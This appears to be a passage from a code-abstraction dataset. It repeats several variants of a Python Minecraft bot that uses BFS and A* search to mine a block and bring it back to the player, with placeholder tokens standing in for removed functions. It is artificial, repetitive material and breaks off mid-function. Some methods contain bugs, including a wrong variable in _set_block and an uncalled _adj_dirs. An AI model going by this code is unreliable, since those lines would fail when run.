\"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n <function token>\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n <function token>\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n <function token>\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n <function token>\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n <function token>\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n <function token>\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n <function token>\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n <function token>\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n <function token>\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n <function token>\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n <function token>\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n <function token>\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n <function token>\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n <function token>\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n 